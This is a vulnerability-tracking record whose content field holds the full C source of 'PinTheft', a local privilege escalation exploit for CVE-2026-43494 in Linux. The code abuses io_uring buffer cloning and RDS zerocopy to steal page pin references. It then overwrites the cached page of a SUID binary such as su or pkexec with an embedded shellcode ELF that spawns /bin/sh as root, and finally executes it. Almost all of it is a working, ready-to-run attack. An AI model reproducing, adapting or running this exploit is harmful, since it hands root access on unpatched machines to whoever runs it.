{"uuid": "ab5f2ec0-a6c4-419c-9ac8-288bcb5c2432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://gist.github.com/spynika/bd10e4ce05b02731dc6266b8ce21160b", "content": "#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef IORING_REGISTER_CLONE_BUFFERS\n#define IORING_REGISTER_CLONE_BUFFERS 19\n#endif\n\nstruct io_uring_clone_buffers {\n __u32 src_fd;\n __u32 flags;\n __u32 src_off;\n __u32 dst_off;\n __u32 nr;\n __u32 pad[3];\n};\n\n#define PAGE_SIZE 4096\n#define GUP_PIN_COUNTING_BIAS 1024\n#define PORT_BASE 20000\n#define MAX_RETRIES 5\n\nstatic const uint8_t SHELL_ELF[129] = {\n 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x03,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x38,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,\n 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n 0x81,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0xb0,0x69,0x0f,0x05,0x48,0x8d,\n 0x3d,0xdb,0xff,0xff,0xff,0x6a,0x00,0x57,0x48,0x89,0xe6,0x31,0xd2,0xb0,0x3b,0x0f,\n 0x05,\n};\n\nstatic const char *suid_candidates[] = {\n \"/usr/bin/su\", \"/bin/su\", \"/usr/bin/mount\", \"/usr/bin/passwd\",\n \"/usr/bin/chsh\", \"/usr/bin/newgrp\", \"/usr/bin/umount\", \"/usr/bin/pkexec\", NULL\n};\n\n#define ANSI_RESET \"\\033[0m\"\n#define ANSI_DIM \"\\033[2m\"\n#define ANSI_BOLD \"\\033[1m\"\n#define ANSI_RED \"\\033[38;5;196m\"\n#define ANSI_GREEN \"\\033[38;5;46m\"\n#define ANSI_CYAN \"\\033[38;5;51m\"\n#define ANSI_YELLOW \"\\033[38;5;226m\"\n#define ANSI_MAGENTA \"\\033[38;5;201m\"\n#define ANSI_ORANGE \"\\033[38;5;208m\"\n#define ANSI_WHITE \"\\033[38;5;255m\"\n#define ANSI_GRAY \"\\033[38;5;245m\"\n#define ANSI_PURPLE \"\\033[38;5;99m\"\n\n#define LOG(fmt, ...) ui_log(fmt, ##__VA_ARGS__)\n#define ERR(fmt, ...) ui_err(fmt, ##__VA_ARGS__)\n#define OK(fmt, ...) ui_ok(fmt, ##__VA_ARGS__)\n\nstatic int g_phase = 0;\n\nstatic void ui_line(void) {\n fprintf(stderr,\n ANSI_GRAY \" \u2570\" ANSI_PURPLE \"\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\" ANSI_RESET \"\\n\");\n}\n\nstatic void ui_banner(void) {\n fprintf(stderr, \"\\n\");\n fprintf(stderr, ANSI_MAGENTA\n \" \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\\n\"\n \" \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\\n\"\n \" \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2557 \u255a\u2588\u2588\u2588\u2588\u2554\u255d \\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2588\u2588\u2554\u255d \\n\"\n \" \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \\n\"\n ANSI_RESET);\n fprintf(stderr,\n ANSI_PURPLE \" \u250c\u2500\" ANSI_RESET\n ANSI_BOLD ANSI_WHITE \" PinTheft \" ANSI_RESET\n ANSI_DIM \"\u00b7\" ANSI_RESET \" \"\n ANSI_CYAN \"CVE-2026-43494\" ANSI_RESET\n ANSI_PURPLE \" \u2500 io_uring GUP pin theft \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\\n\"\n ANSI_RESET);\n fprintf(stderr,\n ANSI_PURPLE \" \u2502\" ANSI_RESET \" \"\n ANSI_GRAY \"kernel local privilege escalation PoC\" ANSI_RESET\n \" \"\n ANSI_PURPLE \"\u2502\\n\"\n ANSI_RESET);\n fprintf(stderr,\n ANSI_PURPLE \" \u2514\" ANSI_GRAY \"\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\" ANSI_RESET\n ANSI_PURPLE \"\u2518\\n\\n\"\n ANSI_RESET);\n}\n\nstatic void ui_phase(const char *title) {\n g_phase++;\n fprintf(stderr, \"\\n\");\n fprintf(stderr,\n ANSI_ORANGE \" \u25b6 \" ANSI_BOLD \"PHASE %d\" ANSI_RESET\n ANSI_GRAY \" \u2502 \" ANSI_RESET\n ANSI_WHITE \"%s\" ANSI_RESET \"\\n\",\n g_phase, title);\n ui_line();\n}\n\nstatic void ui_log(const char *fmt, ...) {\n va_list ap;\n fprintf(stderr, ANSI_CYAN \" \u25c7 \" ANSI_RESET);\n va_start(ap, fmt);\n vfprintf(stderr, fmt, ap);\n va_end(ap);\n fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_ok(const char *fmt, ...) {\n va_list ap;\n fprintf(stderr, ANSI_GREEN \" \u2713 \" ANSI_RESET);\n va_start(ap, fmt);\n vfprintf(stderr, fmt, ap);\n va_end(ap);\n fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_err(const char *fmt, ...) {\n va_list ap;\n fprintf(stderr, ANSI_RED \" \u2717 \" ANSI_RESET);\n va_start(ap, fmt);\n vfprintf(stderr, fmt, ap);\n va_end(ap);\n fprintf(stderr, \"\\n\");\n}\n\nstatic void ui_progress(int cur, int total) {\n const int width = 32;\n int filled = total ? (cur * width) / total : 0;\n if (filled > width) filled = width;\n\n fprintf(stderr, \"\\r\" ANSI_GRAY \" \u2502 \" ANSI_RESET);\n fprintf(stderr, ANSI_PURPLE \"[\");\n for (int i = 0; i < width; i++)\n fprintf(stderr, i < filled ? ANSI_MAGENTA \"\u2588\" : ANSI_GRAY \"\u2591\");\n fprintf(stderr, ANSI_PURPLE \"]\" ANSI_RESET);\n fprintf(stderr, \" \" ANSI_WHITE \"%3d%%\" ANSI_RESET, total ? (cur * 100) / total : 0);\n fprintf(stderr, ANSI_GRAY \" (%d/%d)\" ANSI_RESET, cur, total);\n if (cur >= total)\n fprintf(stderr, \"\\n\");\n fflush(stderr);\n}\n\nstatic void ui_stat_box(const char *label, const char *value, const char *color) {\n fprintf(stderr,\n ANSI_PURPLE \" \u2502 \" ANSI_RESET\n \"%-18s\" ANSI_GRAY \" \u2192 \" ANSI_RESET\n \"%s%s%s\\n\",\n label, color, value, ANSI_RESET);\n}\n\nstatic void ui_footer(int success) {\n fprintf(stderr, \"\\n\");\n if (success) {\n fprintf(stderr,\n ANSI_GREEN\n \" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\"\n \" \u2551 \" ANSI_BOLD \"CHAIN COMPLETE\" ANSI_RESET ANSI_GREEN\n \" \u00b7 spawning privileged context... \u2551\\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\"\n ANSI_RESET);\n } else {\n fprintf(stderr,\n ANSI_RED\n \" \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n\"\n \" \u2551 \" ANSI_BOLD \"ABORTED\" ANSI_RESET ANSI_RED\n \" \u00b7 exploit chain did not finish \u2551\\n\"\n \" \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n\"\n ANSI_RESET);\n }\n}\n\nstatic void pin_cpu(int cpu) {\n cpu_set_t set;\n CPU_ZERO(&set);\n CPU_SET(cpu, &set);\n if (sched_setaffinity(0, sizeof(set), &set) < 0) {\n ERR(\"sched_setaffinity: %s\", strerror(errno));\n exit(1);\n }\n}\n\nstatic const char *find_suid_target(void) {\n for (int i = 0; suid_candidates[i]; i++) {\n struct stat st;\n if (stat(suid_candidates[i], &st) == 0 && (st.st_mode & S_ISUID)) {\n OK(\"Found SUID: %s\", suid_candidates[i]);\n return suid_candidates[i];\n }\n }\n return NULL;\n}\n\nstatic int backup_target(const char *path) {\n const char *name = strrchr(path, '/');\n name = name ? name + 1 : path;\n char backup[256];\n snprintf(backup, sizeof(backup), \"/tmp/.backup_%s_%d\", name, getpid());\n LOG(\"Backing up %s \u2192 %s\", path, backup);\n\n int src = open(path, O_RDONLY);\n if (src < 0) {\n ERR(\"open src: %s\", strerror(errno));\n return -1;\n }\n int dst = open(backup, O_WRONLY | O_CREAT | O_TRUNC, 0755);\n if (dst < 0) {\n ERR(\"open dst: %s\", strerror(errno));\n close(src);\n return -1;\n }\n\n char tmp[4096];\n ssize_t n;\n while ((n = read(src, tmp, sizeof(tmp))) > 0) {\n if (write(dst, tmp, n) != n) {\n ERR(\"write backup: %s\", strerror(errno));\n close(src);\n close(dst);\n return -1;\n }\n }\n close(src);\n close(dst);\n OK(\"Backup: %s\", backup);\n return 0;\n}\n\nstatic int steal_one_ref(void *page_addr, int port) {\n int fd = socket(AF_RDS, SOCK_SEQPACKET, 0);\n if (fd < 0) return -1;\n\n int v = 1;\n setsockopt(fd, SOL_SOCKET, SO_ZEROCOPY, &v, sizeof(v));\n int sndbuf = 2 * 4096 * 4;\n setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &sndbuf, sizeof(sndbuf));\n v = 2;\n setsockopt(fd, SOL_RDS, SO_RDS_TRANSPORT, &v, sizeof(v));\n\n struct sockaddr_in a = {\n .sin_family = AF_INET,\n .sin_addr.s_addr = htonl(INADDR_LOOPBACK),\n .sin_port = htons(port),\n };\n if (bind(fd, (struct sockaddr *)&a, sizeof(a)) < 0) {\n close(fd);\n return -1;\n }\n\n a.sin_port = htons(port + 1);\n struct iovec iov = { page_addr, 2 * PAGE_SIZE };\n\n char cb[CMSG_SPACE(sizeof(uint32_t))];\n memset(cb, 0, sizeof(cb));\n struct cmsghdr *cm = (struct cmsghdr *)cb;\n cm->cmsg_level = SOL_RDS;\n cm->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;\n cm->cmsg_len = CMSG_LEN(sizeof(uint32_t));\n\n struct msghdr m = {\n .msg_name = &a,\n .msg_namelen = sizeof(a),\n .msg_iov = &iov,\n .msg_iovlen = 1,\n .msg_control = cb,\n .msg_controllen = sizeof(cb),\n };\n sendmsg(fd, &m, MSG_ZEROCOPY | MSG_DONTWAIT);\n close(fd);\n return 0;\n}\n\nstruct uring {\n int fd;\n void *sq_ring, *cq_ring;\n struct io_uring_sqe *sqes;\n uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array;\n uint32_t *cq_head, *cq_tail, *cq_mask;\n struct io_uring_cqe *cqes;\n size_t sq_ring_sz, cq_ring_sz, sqes_sz;\n};\n\nstatic int uring_setup(struct uring *r, unsigned entries) {\n struct io_uring_params p;\n memset(&p, 0, sizeof(p));\n\n r->fd = syscall(__NR_io_uring_setup, entries, &p);\n if (r->fd < 0) {\n ERR(\"io_uring_setup: %s\", strerror(errno));\n return -1;\n }\n\n r->sq_ring_sz = p.sq_off.array + p.sq_entries * sizeof(uint32_t);\n r->cq_ring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);\n r->sqes_sz = p.sq_entries * sizeof(struct io_uring_sqe);\n\n r->sq_ring = mmap(NULL, r->sq_ring_sz, PROT_READ | PROT_WRITE,\n MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_SQ_RING);\n if (r->sq_ring == MAP_FAILED) {\n ERR(\"mmap sq_ring: %s\", strerror(errno));\n return -1;\n }\n\n r->cq_ring = mmap(NULL, r->cq_ring_sz, PROT_READ | PROT_WRITE,\n MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_CQ_RING);\n if (r->cq_ring == MAP_FAILED) {\n ERR(\"mmap cq_ring: %s\", strerror(errno));\n return -1;\n }\n\n r->sqes = mmap(NULL, r->sqes_sz, PROT_READ | PROT_WRITE,\n MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_SQES);\n if (r->sqes == MAP_FAILED) {\n ERR(\"mmap sqes: %s\", strerror(errno));\n return -1;\n }\n\n r->sq_head = (uint32_t *)((char *)r->sq_ring + p.sq_off.head);\n r->sq_tail = (uint32_t *)((char *)r->sq_ring + p.sq_off.tail);\n r->sq_mask = (uint32_t *)((char *)r->sq_ring + p.sq_off.ring_mask);\n r->sq_array = (uint32_t *)((char *)r->sq_ring + p.sq_off.array);\n r->cq_head = (uint32_t *)((char *)r->cq_ring + p.cq_off.head);\n r->cq_tail = (uint32_t *)((char *)r->cq_ring + p.cq_off.tail);\n r->cq_mask = (uint32_t *)((char *)r->cq_ring + p.cq_off.ring_mask);\n r->cqes = (struct io_uring_cqe *)((char *)r->cq_ring + p.cq_off.cqes);\n return 0;\n}\n\nstatic int uring_register_buffers(struct uring *r, void *buf, size_t len) {\n struct iovec iov = { .iov_base = buf, .iov_len = len };\n int ret = syscall(__NR_io_uring_register, r->fd,\n IORING_REGISTER_BUFFERS, &iov, 1);\n if (ret < 0) {\n ERR(\"io_uring_register buffers: %s\", strerror(errno));\n return -1;\n }\n return 0;\n}\n\nstatic int uring_clone_buffers(struct uring *dst, struct uring *src) {\n struct io_uring_clone_buffers arg;\n memset(&arg, 0, sizeof(arg));\n arg.src_fd = src->fd;\n int ret = syscall(__NR_io_uring_register, dst->fd,\n IORING_REGISTER_CLONE_BUFFERS, &arg, 1);\n if (ret < 0) {\n ERR(\"io_uring_clone_buffers: %s\", strerror(errno));\n return -1;\n }\n return 0;\n}\n\nstatic pid_t spawn_ring_holder(int ring2_fd) {\n pid_t pid = fork();\n if (pid != 0) return pid;\n fcntl(ring2_fd, F_SETFD, 0);\n for (int fd = 0; fd < 1024; fd++)\n if (fd != ring2_fd) close(fd);\n open(\"/dev/null\", O_RDONLY);\n open(\"/dev/null\", O_WRONLY);\n open(\"/dev/null\", O_WRONLY);\n execl(\"/bin/sleep\", \"sleep\", \"99999\", (char *)NULL);\n _exit(0);\n}\n\nstatic int uring_submit_read_fixed(struct uring *r, int file_fd, void *buf, uint32_t len) {\n uint32_t tail = *r->sq_tail;\n uint32_t idx = tail & *r->sq_mask;\n\n struct io_uring_sqe *sqe = &r->sqes[idx];\n memset(sqe, 0, sizeof(*sqe));\n sqe->opcode = IORING_OP_READ_FIXED;\n sqe->fd = file_fd;\n sqe->off = 0;\n sqe->addr = (uint64_t)(unsigned long)buf;\n sqe->len = len;\n sqe->buf_index = 0;\n\n r->sq_array[idx] = idx;\n __atomic_store_n(r->sq_tail, tail + 1, __ATOMIC_RELEASE);\n\n int ret = syscall(__NR_io_uring_enter, r->fd, 1, 1,\n IORING_ENTER_GETEVENTS, NULL, 0);\n if (ret < 0) {\n ERR(\"io_uring_enter: %s\", strerror(errno));\n return -1;\n }\n return 0;\n}\n\nstatic int uring_wait_cqe(struct uring *r, int32_t *res_out) {\n uint32_t head = *r->cq_head;\n uint32_t tail;\n\n for (int i = 0; i < 1000; i++) {\n tail = __atomic_load_n(r->cq_tail, __ATOMIC_ACQUIRE);\n if (head != tail) break;\n usleep(1000);\n }\n tail = __atomic_load_n(r->cq_tail, __ATOMIC_ACQUIRE);\n if (head == tail) {\n ERR(\"CQ timeout \u2014 no completion\");\n return -1;\n }\n\n uint32_t idx = head & *r->cq_mask;\n if (res_out) *res_out = r->cqes[idx].res;\n __atomic_store_n(r->cq_head, head + 1, __ATOMIC_RELEASE);\n return 0;\n}\n\nstatic void uring_destroy(struct uring *r) {\n if (r->sq_ring && r->sq_ring != MAP_FAILED) munmap(r->sq_ring, r->sq_ring_sz);\n if (r->cq_ring && r->cq_ring != MAP_FAILED) munmap(r->cq_ring, r->cq_ring_sz);\n if (r->sqes && r->sqes != MAP_FAILED) munmap(r->sqes, r->sqes_sz);\n if (r->fd >= 0) close(r->fd);\n memset(r, 0, sizeof(*r));\n r->fd = -1;\n r->sq_ring = r->cq_ring = MAP_FAILED;\n r->sqes = MAP_FAILED;\n}\n\nstatic int create_payload_file(void) {\n char path[] = \"/tmp/.payload_XXXXXX\";\n int fd = mkstemp(path);\n if (fd < 0) {\n ERR(\"mkstemp: %s\", strerror(errno));\n return -1;\n }\n unlink(path);\n\n uint8_t page[PAGE_SIZE];\n memset(page, 0, sizeof(page));\n memcpy(page, SHELL_ELF, sizeof(SHELL_ELF));\n\n if (write(fd, page, PAGE_SIZE) != PAGE_SIZE) {\n ERR(\"write payload: %s\", strerror(errno));\n close(fd);\n return -1;\n }\n return fd;\n}\n\nstatic int evict_page_cache(const char *path) {\n int fd = open(path, O_RDONLY);\n if (fd < 0) {\n ERR(\"fadvise open: %s\", strerror(errno));\n return -1;\n }\n if (posix_fadvise(fd, 0, PAGE_SIZE, POSIX_FADV_DONTNEED) < 0) {\n ERR(\"posix_fadvise: %s\", strerror(errno));\n close(fd);\n return -1;\n }\n close(fd);\n return 0;\n}\n\nstatic int attempt_exploit(const char *target, pid_t *daemon_out, int show_phases) {\n if (show_phases)\n ui_phase(\"Memory & io_uring setup\");\n\n void *buf = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n if (buf == MAP_FAILED) {\n ERR(\"mmap buf: %s\", strerror(errno));\n return -1;\n }\n memset(buf, 0, PAGE_SIZE);\n\n if (mprotect((char *)buf + PAGE_SIZE, PAGE_SIZE, PROT_NONE) < 0) {\n ERR(\"mprotect guard: %s\", strerror(errno));\n munmap(buf, 2 * PAGE_SIZE);\n return -1;\n }\n\n char addr_buf[32];\n snprintf(addr_buf, sizeof(addr_buf), \"%p\", buf);\n ui_stat_box(\"Pinned page\", addr_buf, ANSI_MAGENTA);\n OK(\"2-page mapping + PROT_NONE guard @ %p\", (char *)buf + PAGE_SIZE);\n\n struct uring ring, ring2;\n memset(&ring, 0, sizeof(ring));\n memset(&ring2, 0, sizeof(ring2));\n ring.fd = ring2.fd = -1;\n ring.sq_ring = ring.cq_ring = ring.sqes = MAP_FAILED;\n ring2.sq_ring = ring2.cq_ring = ring2.sqes = MAP_FAILED;\n\n if (uring_setup(&ring, 4) < 0) goto fail_buf;\n if (uring_register_buffers(&ring, buf, PAGE_SIZE) < 0) goto fail_ring;\n OK(\"Ring-1 buffer registered (FOLL_PIN +%d)\", GUP_PIN_COUNTING_BIAS);\n\n if (uring_setup(&ring2, 1) < 0) goto fail_ring;\n if (uring_clone_buffers(&ring2, &ring) < 0) goto fail_ring2;\n OK(\"Ring-2 cloned buffer table (imu->refs = 2)\");\n\n pid_t daemon = spawn_ring_holder(ring2.fd);\n if (daemon < 0) {\n ERR(\"fork daemon: %s\", strerror(errno));\n goto fail_ring2;\n }\n uring_destroy(&ring2);\n char pid_buf[16];\n snprintf(pid_buf, sizeof(pid_buf), \"%d\", (int)daemon);\n ui_stat_box(\"Ring holder\", pid_buf, ANSI_CYAN);\n OK(\"Daemon holds ring2 fd (blocks unpin on cleanup)\");\n *daemon_out = daemon;\n\n if (show_phases)\n ui_phase(\"Pin reference theft (RDS zerocopy)\");\n\n LOG(\"Stealing %d pin refs via RDS zerocopy...\", GUP_PIN_COUNTING_BIAS);\n int stolen = 0;\n for (int i = 0; i < GUP_PIN_COUNTING_BIAS; i++) {\n if (steal_one_ref(buf, PORT_BASE + i * 2) == 0)\n stolen++;\n if ((i & 31) == 0 || i == GUP_PIN_COUNTING_BIAS - 1)\n ui_progress(i + 1, GUP_PIN_COUNTING_BIAS);\n }\n OK(\"Stole %d/%d references\", stolen, GUP_PIN_COUNTING_BIAS);\n if (stolen < GUP_PIN_COUNTING_BIAS - 10) {\n ERR(\"Too few stolen refs (%d) \u2014 RDS may be unavailable\", stolen);\n goto fail_ring;\n }\n\n if (show_phases)\n ui_phase(\"Page cache overwrite & privesc\");\n\n LOG(\"Evicting page 0 of %s from page cache\", target);\n if (evict_page_cache(target) < 0) goto fail_ring;\n OK(\"Page cache evicted\");\n\n LOG(\"Draining PCP (256 populate mmaps)...\");\n void *drain[256];\n for (int i = 0; i < 256; i++) {\n drain[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);\n }\n OK(\"PCP drain complete\");\n\n LOG(\"munmap pinned page \u2192 free to PCP top\");\n if (munmap(buf, PAGE_SIZE) < 0) {\n ERR(\"munmap: %s\", strerror(errno));\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n goto fail_ring;\n }\n OK(\"Page freed \u2014 io_uring retains dangling struct page*\");\n\n LOG(\"pread %s \u2192 reclaim freed frame as page cache\", target);\n int tfd = open(target, O_RDONLY);\n if (tfd < 0) {\n ERR(\"open target: %s\", strerror(errno));\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n goto fail_ring;\n }\n uint8_t scratch[PAGE_SIZE];\n if (pread(tfd, scratch, PAGE_SIZE, 0) < 0) {\n ERR(\"pread: %s\", strerror(errno));\n close(tfd);\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n goto fail_ring;\n }\n close(tfd);\n OK(\"Page cache populated at reclaimed frame\");\n\n for (int i = 0; i < 256; i++)\n if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n\n int payload_fd = create_payload_file();\n if (payload_fd < 0) goto fail_ring;\n OK(\"Payload file ready (%zu byte ELF stub)\", sizeof(SHELL_ELF));\n\n LOG(\"IORING_OP_READ_FIXED \u2192 DMA overwrite page cache via dangling page\");\n if (uring_submit_read_fixed(&ring, payload_fd, buf, PAGE_SIZE) < 0) {\n close(payload_fd);\n goto fail_ring;\n }\n\n int32_t cqe_res;\n if (uring_wait_cqe(&ring, &cqe_res) < 0) {\n close(payload_fd);\n goto fail_ring;\n }\n close(payload_fd);\n\n if (cqe_res < 0) {\n ERR(\"READ_FIXED CQE: %d (%s)\", cqe_res, strerror(-cqe_res));\n goto fail_ring;\n }\n OK(\"DMA write complete (%d bytes)\", cqe_res);\n\n tfd = open(target, O_RDONLY);\n if (tfd < 0) {\n ERR(\"verify open: %s\", strerror(errno));\n goto fail_ring;\n }\n uint8_t check[sizeof(SHELL_ELF)];\n if (pread(tfd, check, sizeof(check), 0) != (ssize_t)sizeof(check)) {\n ERR(\"verify pread: %s\", strerror(errno));\n close(tfd);\n goto fail_ring;\n }\n close(tfd);\n\n if (memcmp(check, SHELL_ELF, sizeof(SHELL_ELF)) != 0) {\n ERR(\"Verification failed \u2014 page cache not overwritten (race lost?)\");\n goto fail_ring;\n }\n OK(\"Verified: page 0 matches SHELL_ELF stub\");\n\n uring_destroy(&ring);\n munmap((char *)buf + PAGE_SIZE, PAGE_SIZE);\n\n ui_footer(1);\n LOG(\"Executing %s (injected stub \u2192 /bin/sh as root)\", target);\n {\n const char *bn = strrchr(target, '/');\n bn = bn ? bn + 1 : target;\n fprintf(stderr,\n ANSI_YELLOW \" \u25c7 Restore: cp /tmp/.backup_%s_%d %s && chmod u+s %s\\n\" ANSI_RESET,\n bn, getpid(), target, target);\n }\n for (int fd = 3; fd < 1024; fd++) close(fd);\n execl(target, target, (char *)NULL);\n ERR(\"execl: %s\", strerror(errno));\n return -1;\n\nfail_ring2:\n uring_destroy(&ring2);\nfail_ring:\n uring_destroy(&ring);\nfail_buf:\n if (buf != MAP_FAILED) munmap(buf, 2 * PAGE_SIZE);\n return -1;\n}\n\nint main(void) {\n ui_banner();\n pin_cpu(0);\n\n ui_phase(\"Reconnaissance\");\n LOG(\"Affinity locked to CPU 0\");\n ui_stat_box(\"CPU pin\", \"cpu0\", ANSI_CYAN);\n\n const char *target = find_suid_target();\n if (!target) {\n ERR(\"No SUID binary found\");\n ui_footer(0);\n return 1;\n }\n ui_stat_box(\"SUID target\", target, ANSI_YELLOW);\n\n if (backup_target(target) < 0) {\n ERR(\"Backup failed \u2014 aborting for safety\");\n ui_footer(0);\n return 1;\n }\n\n pid_t daemons[MAX_RETRIES];\n int ndaemons = 0;\n\n for (int attempt = 0; attempt < MAX_RETRIES; attempt++) {\n if (attempt > 0) {\n fprintf(stderr, \"\\n\");\n LOG(\"Retry attempt %d/%d\", attempt + 1, MAX_RETRIES);\n }\n\n pid_t daemon = 0;\n int ret = attempt_exploit(target, &daemon, attempt == 0);\n if (daemon > 0)\n daemons[ndaemons++] = daemon;\n if (ret == 0)\n return 0;\n if (attempt < MAX_RETRIES - 1) {\n ERR(\"Attempt %d failed\", attempt + 1);\n sleep(1);\n }\n }\n\n for (int i = 0; i < ndaemons; i++) {\n kill(daemons[i], SIGKILL);\n waitpid(daemons[i], NULL, 0);\n }\n ui_footer(0);\n ERR(\"All %d attempts failed \u2014 kernel may be patched or RDS/io_uring unavailable\", MAX_RETRIES);\n return 1;\n}", "creation_timestamp": "2026-05-26T12:09:45.000000Z"}